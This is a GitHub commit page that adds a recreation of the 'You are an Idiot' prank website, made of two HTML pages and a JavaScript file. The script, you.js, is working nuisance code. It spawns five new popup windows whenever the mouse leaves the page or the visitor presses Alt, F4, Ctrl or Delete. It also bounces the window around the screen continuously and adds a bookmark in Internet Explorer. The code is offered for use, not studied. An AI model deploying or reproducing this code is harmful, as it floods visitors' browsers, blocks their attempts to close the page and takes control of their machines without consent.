Skip to content

Commit

Permalink
Add files via upload
Browse files Browse the repository at this point in the history
asdasaddsasada
  • Loading branch information
baseinfinite authored Jan 5, 2024
0 parents commit 89e45e2
Show file tree
Hide file tree
Showing 5 changed files with 126 additions and 0 deletions.
Empty file added idiot.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
30 changes: 30 additions & 0 deletions index.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
<html>
<head>
<title>You are an Idiot! (dot cc)</title>

<meta name="Author" content="The ADR and Jazzy (2020 - Endermanch) + evanultra for flash deprecation">
<meta name="Keywords" content="you are an idiot, you, are, an, idiot, fool, youdontknowwhoiam.org, youdontknowwhoiam, you dont know who i am, you, dont, know, who, i, am, org, dot, aregner, jazzy, adr">
<meta name="Description" content="This is the orgional and the best flash video on the 'net. Once found on www.youdontknowwhoiam.org, not found where it belong, right here on www.youareanidiot.org.">

<meta property="og:type" content="website">
<meta property="og:title" content="You are an idiot! (evanultra01 dot github dot io)">
<meta property="og:description" content="Make YAAI work in 2021.">
<meta property="og:image" content="idiot.png">
<meta property="og:image:secure_url" content="idiot.png">
<meta property="og:image:width" content="256">
<meta property="og:image:height" content="256">
<meta property="og:image:alt" content="Idiot!">
<link rel="icon" type="image/png" href="/idiot.png">


<script src="you.js"></script>
</head>

<body bgcolor="#ffffff" onload="flagRun=1;playBall();return true;bookmark();" onkeydown="altf4key();ctrlkey();delkey();" onmouseout="procreate();" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="100%" height="100%">
<param name="movie" value="youare.swf">
<param name="quality" value="high">
<embed src="youare.swf" quality="high" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100%" height="100%"></embed>
</object>
</body>
</html>
15 changes: 15 additions & 0 deletions lol.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,15 @@
<html>
<head>
<title>You are an idiot!</title>
<script src="you.js"></script>
</head>

<body bgcolor="#ffffff" onload="flagRun=1;playBall();return true;" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="100%" height="100%">
<param name="movie" value="youare.swf">
<param name="quality" value="high">

<embed src="youare.swf" quality="high" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100%" height="100%"></embed>
</object>
</body>
</html>
81 changes: 81 additions & 0 deletions you.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,81 @@
function bookmark() {
if ((navigator.appName == "Microsoft Internet Explorer")
&& (parseInt(navigator.appVersion) >= 4))
{
var url="lol.html";
var title="Idiot!";
window.external.AddFavorite(url,title);
}
}

var xOff = 5;
var yOff = 5;
var xPos = 400;
var yPos = -100;
var flagRun = 1;

function changeTitle(title) {
document.title = title;
}

function openWindow(url) {
aWindow = window.open(url, "_blank", 'menubar=no, status=no, toolbar=no, resizable=no, width=357, height=330, titlebar=no, alwaysRaised=yes');
}

function procreate() {
changeTitle("Idiot!");
for (var i = 0; i < 5; i++) {
openWindow('lol.html');
}
}

function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) { alert("You are an idiot!"); procreate(); } }
function ctrlkey() { if (event.keyCode == 17) { alert("You are an idiot!"); procreate(); } }
function delkey() { if (event.keyCode == 46) { alert("You are an idiot!"); procreate(); } }

function newXlt(){
xOff = Math.ceil(-6 * Math.random()) * 5 - 10 ;
window.focus()
}

function newXrt(){
xOff = Math.ceil(7 * Math.random()) * 5 - 10 ;
}

function newYup(){
yOff = Math.ceil(-6 * Math.random()) * 5 - 10 ;
}

function newYdn(){
yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ;
}

function fOff(){
flagrun = 0;
}

function playBall() {
xPos += xOff;
yPos += yOff;

if (xPos > screen.width - 357) {
newXlt();
}

if (xPos < 0){
newXrt();
}

if (yPos > screen.height - 330) {
newYup();
}

if (yPos < 0){
newYdn();
}

if (flagRun == 1){
window.moveTo(xPos, yPos);
setTimeout('playBall()', 1);
}
}
Empty file added youare.swf
Empty file.

0 comments on commit 89e45e2

Please sign in to comment.